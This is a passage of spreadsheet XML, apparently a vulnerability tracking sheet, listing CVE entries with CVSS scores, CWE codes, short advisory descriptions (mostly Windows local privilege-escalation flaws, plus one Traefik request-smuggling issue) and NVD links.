          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="C3467" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3467" s="5" t="inlineStr"/>
      <c r="F3467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3467" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3467" s="5" t="inlineStr"/>
      <c r="I3467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3467" s="5" t="inlineStr"/>
      <c r="K3467" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3467" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="3468">
      <c r="A3468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="C3468" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3468" s="5" t="inlineStr"/>
      <c r="F3468" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3468" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3468" s="5" t="inlineStr"/>
      <c r="I3468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3468" s="5" t="inlineStr"/>
      <c r="K3468" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="L3468" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="3469">
      <c r="A3469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="C3469" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3469" s="5" t="inlineStr"/>
      <c r="F3469" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3469" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3469" s="5" t="inlineStr"/>
      <c r="I3469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3469" s="5" t="inlineStr"/>
      <c r="K3469" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3469" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="3470">
      <c r="A3470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="C3470" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3470" s="5" t="inlineStr"/>
      <c r="F3470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3470" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3470" s="5" t="inlineStr"/>
      <c r="I3470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3470" s="5" t="inlineStr"/>
      <c r="K3470" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3470" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="3471">
      <c r="A3471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="C3471" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3471" s="5" t="inlineStr"/>
      <c r="F3471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3471" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3471" s="5" t="inlineStr"/>
      <c r="I3471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3471" s="5" t="inlineStr"/>
      <c r="K3471" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3471" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="3472">
      <c r="A3472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="C3472" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3472" s="5" t="inlineStr"/>
      <c r="F3472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3472" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3472" s="5" t="inlineStr"/>
      <c r="I3472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3472" s="5" t="inlineStr"/>
      <c r="K3472" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3472" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="3473">
      <c r="A3473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="C3473" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3473" s="5" t="inlineStr"/>
      <c r="F3473" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3473" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3473" s="5" t="inlineStr"/>
      <c r="I3473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3473" s="5" t="inlineStr"/>
      <c r="K3473" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3473" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="3474">
      <c r="A3474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="C3474" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3474" s="5" t="inlineStr"/>
      <c r="F3474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3474" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3474" s="5" t="inlineStr"/>
      <c r="I3474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3474" s="5" t="inlineStr"/>
      <c r="K3474" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3474" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="3475">
      <c r="A3475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="C3475" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3475" s="5" t="inlineStr"/>
      <c r="F3475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3475" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3475" s="5" t="inlineStr"/>
      <c r="I3475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3475" s="5" t="inlineStr"/>
      <c r="K3475" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3475" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="3476">
      <c r="A3476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="C3476" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3476" s="5" t="inlineStr"/>
      <c r="F3476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3476" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3476" s="5" t="inlineStr"/>
      <c r="I3476" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3476" s="5" t="inlineStr"/>
      <c r="K3476" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3476" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="3477">
      <c r="A3477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="C3477" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3477" s="5" t="inlineStr"/>
      <c r="F3477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3477" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3477" s="5" t="inlineStr"/>
      <c r="I3477" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3477" s="5" t="inlineStr"/>
      <c r="K3477" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3477" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="3478">
      <c r="A3478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="C3478" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3478" s="5" t="inlineStr"/>
      <c r="F3478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3478" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3478" s="5" t="inlineStr"/>
      <c r="I3478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3478" s="5" t="inlineStr"/>
      <c r="K3478" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3478" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="3479">
      <c r="A3479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="C3479" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3479" s="5" t="inlineStr"/>
      <c r="F3479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3479" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3479" s="5" t="inlineStr"/>
      <c r="I3479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3479" s="5" t="inlineStr"/>
      <c r="K3479" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L3479" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="3480">
      <c r="A3480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="C3480" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3480" s="5" t="inlineStr"/>
      <c r="F3480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3480" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3480" s="5" t="inlineStr"/>
      <c r="I3480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3480" s="5" t="inlineStr"/>
      <c r="K3480" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3480" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="3481">
      <c r="A3481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70578</t>
        </is>
      </c>
      <c r="C3481" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3481" s="5" t="inlineStr"/>
      <c r="F3481" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3481" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3481" s="5" t="inlineStr"/>
      <c r="I3481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3481" s="5" t="inlineStr"/>
      <c r="K3481" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3481" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t>
        </is>
      </c>
    </row>
    <row r="3482">
      <c r="A3482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="C3482" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3482" s="5" t="inlineStr"/>
      <c r="F3482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3482" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3482" s="5" t="inlineStr"/>
      <c r="I3482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3482" s="5" t="inlineStr"/>
      <c r="K3482" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3482" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="3483">
      <c r="A3483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71324</t>
        </is>
      </c>
      <c r="C3483" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3483" s="5" t="inlineStr"/>
      <c r="F3483" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3483" s="5" t="inlineStr"/>
      <c r="H3483" s="5" t="inlineStr"/>
      <c r="I3483" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3483" s="5" t="inlineStr"/>
      <c r="K3483" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L3483" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. Prior to 2.11.53, 3.6.24, and 3.7.9, Traefik's default HTTP reverse proxy forwards a plain HTTP/2 or HTTP/3 CONNECT request and its body to an HTTP/1.1 upstream through a shared net/http.Transport. When the upstream answers the CONNECT with a keep-alive non-2xx response and does not drain the body, Traefik returns the desynchronized backend socket to its shared pool and reuses it for other clients. An unauthenticated attacker can use this behavior to make a different client read the attacker's smuggled response, which can include authenticated or private content from another request. The ForwardAuth middleware with forwardBody true and preserveRequestMethod true can re-issue a CONNECT with the buffered body attached, exposing the auth-client pool to the same desynchronization. This issue is fixed in 2.11.53, 3.6.24, and 3.7.9.</t>
        </is>
      </c>
      <c r="M3483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71324</t>
        </is>
      </c>
    </row>
    <row r="3484">
      <c r="A3484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="C3484" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3484" s="5" t="inlineStr"/>
      <c r="F3484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3484" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3484" s="5" t="inlineStr"/>
      <c r="I3484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3484" s="5" t="inlineStr"/>
      <c r="K3484" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3484" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="3485">
      <c r="A3485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="C3485" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3485" s="5" t="inlineStr"/>
      <c r="F3485" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3485" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3485" s="5" t="inlineStr"/>
      <c r="I3485" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3485" s="5" t="inlineStr"/>
      <c r="K3485" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3485" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="3486">
      <c r="A3486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="C3486" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3486" s="5" t="inlineStr"/>
      <c r="F3486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3486" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3486" s="5" t="inlineStr"/>
      <c r="I3486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3486" s="5" t="inlineStr"/>
      <c r="K3486" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3486" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="3487">
      <c r="A3487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="C3487" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3487" s="5" t="inlineStr"/>
      <c r="F3487" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3487" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3487" s="5" t="inlineStr"/>
      <c r="I3487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3487" s="5" t="inlineStr"/>
      <c r="K3487" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3487" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="3488">
      <c r="A3488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71351</t>
        </is>
      </c>
      <c r="C3488" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3488" s="5" t="inlineStr"/>
      <c r="F3488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3488" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3488" s="5" t="inlineStr"/>
      <c r="I3488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3488" s="5" t="inlineStr"/>
      <c r="K3488" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3488" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t>
        </is>
      </c>
    </row>
    <row r="3489">
      <c r="A3489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71353</t>
        </is>
      </c>
      <c r="C3489" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3489" s="5" t="inlineStr"/>
      <c r="F3489" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3489" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3489" s="5" t="inlineStr"/>
      <c r="I3489" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3489" s="5" t="inlineStr"/>
      <c r="K3489" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3489" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t>
        </is>
      </c>
    </row>
    <row r="3490">
      <c r="A3490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72718</t>
        </is>
      </c>
      <c r="C3490" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3490" s="5" t="inlineStr"/>
      <c r="F3490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3490" s="5" t="inlineStr"/>
      <c r="H3490" s="5" t="inlineStr"/>
      <c r="I3490" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3490" s="5" t="inlineStr"/>
      <c r="K3490" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3490" s="5" t="inlineStr">
        <is>
